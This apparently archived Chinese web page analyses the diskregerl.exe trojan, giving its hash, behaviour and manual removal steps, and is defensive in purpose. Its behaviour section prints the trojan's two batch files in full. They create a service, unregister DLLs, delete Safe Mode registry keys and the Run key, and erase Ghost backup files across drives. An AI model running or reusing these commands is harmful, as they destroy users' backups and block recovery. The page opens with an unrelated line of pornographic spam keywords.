欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

diskregerl.exe(Trojan.Agent.cdt)病毒手動(dòng)查殺

 更新時(shí)間:2008年04月16日 23:09:30   作者:  
文件名稱:diskregerl.exe 文件大小:45,056 字節(jié) AV命名:Trojan.Agent.cdt 加殼方式:UPX 編寫語言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行為分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe  45,056 字節(jié)
2、無添加啟動(dòng)項(xiàng)舉動(dòng)。
3、釋放2個(gè)批處理:
內(nèi)容分別為:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創(chuàng)建網(wǎng)絡(luò)連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨(dú)更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個(gè):
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網(wǎng)站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外該病毒可能惡意鎖定IE主頁,不過未實(shí)現(xiàn)。
解決方法:
1、重啟計(jì)算機(jī)。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啟后病毒無法刪除,請(qǐng)下載冰刃(該軟件可到down.45it.com下載),結(jié)束其進(jìn)程。
按此在新窗口打開圖片

相關(guān)文章

最新評(píng)論